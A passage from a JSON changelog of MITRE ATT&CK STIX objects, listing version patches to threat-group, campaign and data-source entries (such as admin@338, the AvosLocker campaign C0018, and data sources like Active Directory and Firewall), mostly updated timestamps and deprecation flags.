Retrieved February 10, 2021.", + "url": "https://security.web.cern.ch/advisories/windigo/windigo.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:49:09.909000+00:00\", \"old_value\": \"2025-04-16 20:37:36.164000+00:00\"}}}", + "previous_version": "1.0" + }, + { + "type": "intrusion-set", + "id": "intrusion-set--16ade1aa-0ea1-4bb7-88cc-9079df2ae756", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2017-05-31 21:31:53.579000+00:00", + "modified": "2025-04-25 14:48:47.886000+00:00", + "name": "admin@338", + "description": "[admin@338](https://attack.mitre.org/groups/G0018) is a China-based cyber threat group. It has previously used newsworthy events as lures to deliver malware and has primarily targeted organizations involved in financial, economic, and trade policy, typically using publicly available RATs such as [PoisonIvy](https://attack.mitre.org/software/S0012), as well as some non-public backdoors. (Citation: FireEye admin@338)", + "aliases": [ + "admin@338" + ], + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/groups/G0018", + "external_id": "G0018" + }, + { + "source_name": "admin@338", + "description": "(Citation: FireEye admin@338)" + }, + { + "source_name": "FireEye admin@338", + "description": "FireEye Threat Intelligence. (2015, December 1). China-based Cyber Threat Group Uses Dropbox for Malware Communications and Targets Hong Kong Media Outlets. 
Retrieved December 4, 2015.", + "url": "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Tatsuya Daitoku, Cyber Defense Institute, Inc." + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.2", + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25 14:48:47.886000+00:00\", \"old_value\": \"2025-04-16 20:37:33.261000+00:00\"}}}", + "previous_version": "1.2" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "campaigns": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "campaign", + "id": "campaign--519ee082-8ab6-439b-988f-a8a3f02c8d30", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2023-01-17 21:42:34.998000+00:00", + "modified": "2025-04-21 19:40:47.537000+00:00", + "name": "C0018", + "description": "\n[C0018](https://attack.mitre.org/campaigns/C0018) was a month-long ransomware intrusion that successfully deployed [AvosLocker](https://attack.mitre.org/software/S1053) onto a compromised network. 
The unidentified actors gained initial access to the victim network through an exposed server and used a variety of open-source tools prior to executing [AvosLocker](https://attack.mitre.org/software/S1053).(Citation: Costa AvosLocker May 2022)(Citation: Cisco Talos Avos Jun 2022)", + "aliases": [ + "C0018" + ], + "first_seen": "2022-02-01 05:00:00+00:00", + "last_seen": "2022-03-01 05:00:00+00:00", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/campaigns/C0018", + "external_id": "C0018" + }, + { + "source_name": "Costa AvosLocker May 2022", + "description": "Costa, F. (2022, May 1). RaaS AvosLocker Incident Response Analysis. Retrieved January 11, 2023.", + "url": "https://www.linkedin.com/pulse/raas-avoslocker-incident-response-analysis-fl%C3%A1vio-costa?trk=articles_directory" + }, + { + "source_name": "Cisco Talos Avos Jun 2022", + "description": "Venere, G. Neal, C. (2022, June 21). Avos ransomware group expands with new attack arsenal. 
Retrieved January 11, 2023.", + "url": "https://blog.talosintelligence.com/avoslocker-new-arsenal/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Fl\u00e1vio Costa, @Seguran\u00e7a Descomplicada" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_first_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_last_seen_citation": "(Citation: Cisco Talos Avos Jun 2022)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0", + "detailed_diff": "{\"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-21 19:40:47.537000+00:00\", \"old_value\": \"2025-04-16 20:37:46.763000+00:00\"}, \"root['x_mitre_contributors'][0]\": {\"new_value\": \"Fl\\u00e1vio Costa, @Seguran\\u00e7a Descomplicada\", \"old_value\": \"Flavio Costa, Cisco\"}}}", + "previous_version": "1.0" + } + ], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "assets": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "mitigations": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [], + "revocations": [], + "deprecations": [], + "deletions": [] + }, + "datasources": { + "additions": [], + "major_version_changes": [], + "minor_version_changes": [], + "other_version_changes": [], + "patches": [ + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--d6188aac-17db-4861-845f-57c369f9b4c8", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0026", 
+ "external_id": "DS0026" + }, + { + "source_name": "Microsoft AD DS Getting Started", + "description": "Foulds, I. et al. (2018, August 7). AD DS Getting Started. Retrieved September 23, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/ad-ds-getting-started" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:52.686Z", + "name": "Active Directory", + "description": "A database and set of services that allows administrators to manage permissions, access to network resources, and stored data objects (user, group, application, or devices)(Citation: Microsoft AD DS Getting Started)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:52.686Z\", \"old_value\": \"2025-04-16T20:39:09.450Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--40269753-26bd-437b-986e-159c66dec5e4", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0015", + "external_id": "DS0015" + }, + { + "source_name": "Confluence Logs", + "description": "Confluence Support. (2021, April 22). Working with Confluence Logs. 
Retrieved September 23, 2021.", + "url": "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:03.068Z", + "name": "Application Log", + "description": "Events collected by third-party services such as mail servers, web applications, or other appliances (not by the native OS or platform)(Citation: Confluence Logs)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:03.068Z\", \"old_value\": \"2025-04-16T20:39:10.207Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--29aa4e0e-4a26-4f79-a9bc-1ae66df1c923", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0037", + "external_id": "DS0037" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:54.643Z", + "name": "Certificate", + "description": "A digital document, which highlights information such as the owner's identity, used to instill trust in public keys used while encrypting network communications", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], 
+ "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:54.643Z\", \"old_value\": \"2025-04-16T20:39:10.496Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--dd75f457-8dc0-4a24-9ae5-4b61c33af866", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0038", + "external_id": "DS0038" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:57.359Z", + "name": "Domain Name", + "description": "Information obtained (commonly through registration or activity logs) regarding one or more IP addresses registered with human readable names (ex: mitre.org)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:57.359Z\", \"old_value\": \"2025-04-16T20:39:11.900Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--61bbbf27-f7c3-46ba-a6bc-48ae76928065", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + 
"source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0016", + "external_id": "DS0016" + }, + { + "source_name": "Sysmon EID 9", + "description": "Russinovich, R. & Garnier, T. (2021, August 18). Sysmon Event ID 9. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/sysinternals/downloads/sysmon#event-id-9-rawaccessread" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.700Z", + "name": "Drive", + "description": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter(Citation: Sysmon EID 9)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.700Z\", \"old_value\": \"2025-04-18T15:12:29.888Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--9ec8c0d7-6137-456f-b829-c5f8b96ba054", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0027", + "external_id": "DS0027" + }, + { + "source_name": "IOKit Fundamentals", + "description": "Apple. (2014, April 9). What Is the I/O Kit?. 
Retrieved September 24, 2021.", + "url": "https://developer.apple.com/library/archive/documentation/DeviceDrivers/Conceptual/IOKitFundamentals/Features/Features.html" + }, + { + "source_name": "Windows Getting Started Drivers", + "description": "Viviano, A. (2021, August 17). Getting started with Windows drivers: User mode and kernel mode. Retrieved September 24, 2021.", + "url": "https://docs.microsoft.com/en-us/windows-hardware/drivers/gettingstarted/user-mode-and-kernel-mode" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:53.761Z", + "name": "Driver", + "description": "A computer program that operates or controls a particular type of device that is attached to a computer. Provides a software interface to hardware devices, enabling operating systems and other computer programs to access hardware functions without needing to know precise details about the hardware being used(Citation: IOKit Fundamentals)(Citation: Windows Getting Started Drivers)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:53.761Z\", \"old_value\": \"2025-04-16T20:39:09.930Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f2f4f4bd-3455-400f-b2ee-104004df0f5b", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": 
"mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0018", + "external_id": "DS0018" + }, + { + "source_name": "AWS Sec Groups VPC", + "description": "Amazon. (n.d.). Security groups for your VPC. Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/vpc/latest/userguide/VPC_SecurityGroups.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:58.457Z", + "name": "Firewall", + "description": "A network security system, running locally on an endpoint or remotely as a service (ex: cloud environment), that monitors and controls incoming/outgoing network traffic based on predefined rules(Citation: AWS Sec Groups VPC)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "Linux", + "SaaS", + "Windows", + "macOS", + "Office Suite", + "Identity Provider", + "ESXi" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:58.457Z\", \"old_value\": \"2025-04-16T20:39:12.372Z\"}}}", + "previous_version": "1.1" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ca1cb239-ff6d-4f64-b9d7-41c8556a8b4f", + "created": "2021-10-20T15:05:19.265Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0001", + "external_id": "DS0001" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": 
"2025-04-25T14:40:07.251Z", + "name": "Firmware", + "description": "Computer software that provides low-level control for the hardware and device(s) of a host, such as BIOS or UEFI/EFI", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:07.251Z\", \"old_value\": \"2025-04-18T15:12:49.401Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--3c07684f-3794-4536-8f70-21efe700c0ec", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0036", + "external_id": "DS0036" + }, + { + "source_name": "Amazon IAM Groups", + "description": "Amazon. (n.d.). IAM user groups. 
Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_groups.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:55.737Z", + "name": "Group", + "description": "A collection of multiple user accounts that share the same access rights to the computer and/or network resources and have common security rights(Citation: Amazon IAM Groups)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS", + "SaaS", + "Windows", + "Office Suite", + "Identity Provider" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane", + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:55.737Z\", \"old_value\": \"2025-04-16T20:39:10.972Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--1ac0ca69-e07e-4b34-9061-e4588e146c52", + "created": "2021-10-20T15:05:19.271Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0007", + "external_id": "DS0007" + }, + { + "source_name": "Microsoft Image", + "description": "Microsoft. (2021, August 23). Create a managed image of a generalized VM in Azure. Retrieved October 13, 2021.", + "url": "https://docs.microsoft.com/en-us/azure/virtual-machines/windows/capture-image-resource" + }, + { + "source_name": "Amazon AMI", + "description": "Amazon. (n.d.). Amazon Machine Images (AMI). 
Retrieved October 13, 2021.", + "url": "https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/AMIs.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:56.103Z", + "name": "Image", + "description": "A single file used to deploy a virtual machine/bootable disk into an on-premise or third-party cloud environment(Citation: Microsoft Image)(Citation: Amazon AMI)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "IaaS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Cloud Control Plane" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:56.103Z\", \"old_value\": \"2025-04-16T20:39:11.122Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--38fe306c-bdec-4f3d-8521-b72dd32dbd17", + "created": "2021-10-20T15:05:19.275Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0035", + "external_id": "DS0035" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:51.440Z", + "name": "Internet Scan", + "description": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_deprecated": false, + 
"x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_collection_layers": [ + "OSINT" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:51.440Z\", \"old_value\": \"2025-04-16T20:39:08.675Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--8765a845-dea1-4cd1-a56f-f54939b7ab9e", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0008", + "external_id": "DS0008" + }, + { + "source_name": "STIG Audit Kernel Modules", + "description": "Unified Compliance Framework. (2016, December 20). The audit system must be configured to audit the loading and unloading of dynamic kernel modules.. Retrieved September 28, 2021.", + "url": "https://www.stigviewer.com/stig/oracle_linux_5/2016-12-20/finding/V-22383" + }, + { + "source_name": "Init Man Page", + "description": "Kerrisk, M. (2021, March 22). INIT_MODULE(2). 
Retrieved September 28, 2021.", + "url": "https://man7.org/linux/man-pages/man2/init_module.2.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:57.731Z", + "name": "Kernel", + "description": "A computer program, at the core of a computer OS, that resides in memory and facilitates interactions between hardware and software components(Citation: STIG Audit Kernel Modules)(Citation: Init Man Page)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:57.731Z\", \"old_value\": \"2025-04-16T20:39:12.054Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--f424e4b4-a8a4-4c58-a4ae-4f53bfd08563", + "created": "2021-10-20T15:05:19.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0011", + "external_id": "DS0011" + }, + { + "source_name": "Microsoft LoadLibrary", + "description": "Microsoft. (2018, December 5). LoadLibraryA function (libloaderapi.h). Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/api/libloaderapi/nf-libloaderapi-loadlibrarya" + }, + { + "source_name": "Microsoft Module Class", + "description": "Microsoft. (n.d.). Module Class. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.reflection.module" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:40:06.151Z", + "name": "Module", + "description": "Executable files consisting of one or more shared classes and interfaces, such as portable executable (PE) format binaries/dynamic link libraries (DLL), executable and linkable format (ELF) binaries/shared libraries, and Mach-O format binaries/shared libraries(Citation: Microsoft LoadLibrary)(Citation: Microsoft Module Class)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack", + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:40:06.151Z\", \"old_value\": \"2025-04-18T15:12:13.134Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--221adcd5-cccf-44df-9be6-ef607a6e1c3c", + "created": "2021-10-20T15:05:19.273Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0023", + "external_id": "DS0023" + }, + { + "source_name": "Microsoft Named Pipes", + "description": "Microsoft. (2018, May 31). Named Pipes. 
Retrieved September 28, 2021.", + "url": "https://docs.microsoft.com/en-us/windows/win32/ipc/named-pipes" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2025-04-25T14:49:53.223Z", + "name": "Named Pipe", + "description": "Mechanisms that allow inter-process communication locally or over the network. A named pipe is usually found as a file and processes attach to it(Citation: Microsoft Named Pipes)", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "Windows", + "macOS" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "Center for Threat-Informed Defense (CTID)" + ], + "x_mitre_collection_layers": [ + "Host" + ], + "detailed_diff": "{\"dictionary_item_added\": {\"root['x_mitre_deprecated']\": false}, \"values_changed\": {\"root['modified']\": {\"new_value\": \"2025-04-25T14:49:53.223Z\", \"old_value\": \"2025-04-16T20:39:09.639Z\"}}}", + "previous_version": "1.0" + }, + { + "type": "x-mitre-data-source", + "id": "x-mitre-data-source--ba27545a-9c32-47ea-ba6a-cce50f1b326e", + "created": "2021-10-20T15:05:19.274Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/datasources/DS0033", + "external_id": "DS0033" + }, + { + "source_name": "Microsoft NFS Overview", + "description": "Microsoft. (2018, July 9). Network File System overview. 
